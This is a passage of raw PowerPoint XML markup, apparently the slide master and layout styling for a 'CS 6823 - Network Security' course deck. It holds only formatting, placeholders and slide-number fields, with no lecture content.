          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6A1B6BF3-38D9-4364-AD18-D6EE58A8FDB2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{033802FC-4781-4619-8F68-085635184A57}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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charset="0"/>
            </a:endParaRPr>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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A2F7930A-3EBB-4C38-A814-809C4CC5BE28}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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3"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="9505950"/>
            <a:ext cx="1917700" cy="17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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CS 6823 - Network Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1CF85DE0-70B7-459E-9359-07C571F31E53}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 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bwMode="auto">
          <a:xfrm>
            <a:off x="1336" y="0"/>
            <a:ext cx="5401151" cy="8382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ransition/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="39688" indent="-39688" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="8400" i="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="39688" indent="-39688"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2pPr>
      <a:lvl3pPr marL="39688" indent="-39688"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3pPr>
      <a:lvl4pPr marL="39688" indent="-39688"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4pPr>
      <a:lvl5pPr marL="39688" indent="-39688"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5pPr>
      <a:lvl6pPr marL="496888"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6pPr>
      <a:lvl7pPr marL="954088"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7pPr>
      <a:lvl8pPr marL="1411288"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8pPr>
      <a:lvl9pPr marL="1868488"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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="39688" indent="-39688" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="496888" indent="-39688" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="954088" indent="-39688" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1411288" indent="-39688" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1868488" indent="-39688" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2325688" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2782888" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3240088" algn="ctr" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Gill Sans" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3697288"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49" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CDEB0941-AB80-494A-9082-85888840054B}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="317500" y="0"/>
            <a:ext cx="12382500" cy="1854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50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="571500" y="1968500"/>
            <a:ext cx="12128500" cy="77851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50800" tIns="50800" rIns="50800" bIns="508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pic>
        <p:nvPicPr>
          <p:cNvPr id="13317" name="Picture 3"/>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auto">
          <a:xfrm>
            <a:off x="1336" y="0"/>
            <a:ext cx="5401151"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57680309"/>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ransition/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:cs typeface="ヒラギノ角ゴ ProN W3" charset="-128"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="406400" indent="-177800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="863600" indent="-254000" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1320800" indent="-406400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1778000" indent="-596900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2235200" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2692400" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3149600" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
          <a:sym typeface="Arial" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3606800" indent="-596900" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="400080"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFont typeface="Gill Sans" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="36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49" name="Text Box 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CDEB0941-AB80-494A-9082-85888840054B}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ea typeface="ヒラギノ角ゴ ProN W3" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="317500" y="0"/>
            <a:ext cx="12382500" cy="1854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50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="571500" y="1968500"/>
            <a:ext cx="12128500" cy="77851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50800" tIns="50800" rIns="50800" bIns="508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pic>
        <p:nvPicPr>
          <p:cNvPr id="13317" name="Picture 3"/>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auto">
          <a:xfrm>
            <a:off x="-12700" y="0"/>
            <a:ext cx="5401151"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03991706"/>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ransition/>
